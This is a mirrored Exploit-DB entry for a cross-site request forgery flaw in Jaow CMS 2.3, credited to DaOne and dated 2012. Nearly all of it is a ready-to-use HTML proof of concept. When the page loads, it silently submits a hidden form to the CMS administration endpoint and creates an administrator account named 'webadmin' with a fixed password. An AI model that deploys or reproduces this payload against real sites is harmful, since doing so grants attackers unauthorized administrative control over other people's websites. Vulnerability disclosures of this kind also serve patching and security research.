Jaow CMS 2.3 – Cross-Site Request Forgery

  • 作者: DaOne
    日期: 2012-08-17
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/20573/
  • ##########################################
    [~] Exploit Title: Jaow CMS v2.3 CSRF Vulnerability
    [~] Author: DaOne [LCA]
    [~] Date: 15/8/2012
    [~] Software Link: http://www.jaow.net
    [~] Or: http://scripts.toocharger.com/fiches/scripts/jaow/5370.htm
    ##########################################
    
    [#] [ CSRF Add Admin ]
    
    <html>
    <body onload="document.form0.submit();">
    <form method="POST" name="form0" action="http://[target]/administration/utilisateur.php">
    <input type="hidden" name="Nom" value="webadmin"/>
    <input type="hidden" name="Prenom" value="webadmin"/>
    <input type="hidden" name="Pseudo" value="webadmin"/>
    <input type="hidden" name="Mdp" value="pass123"/>
    </form>
    </body>
    </html>
    
    ##########################################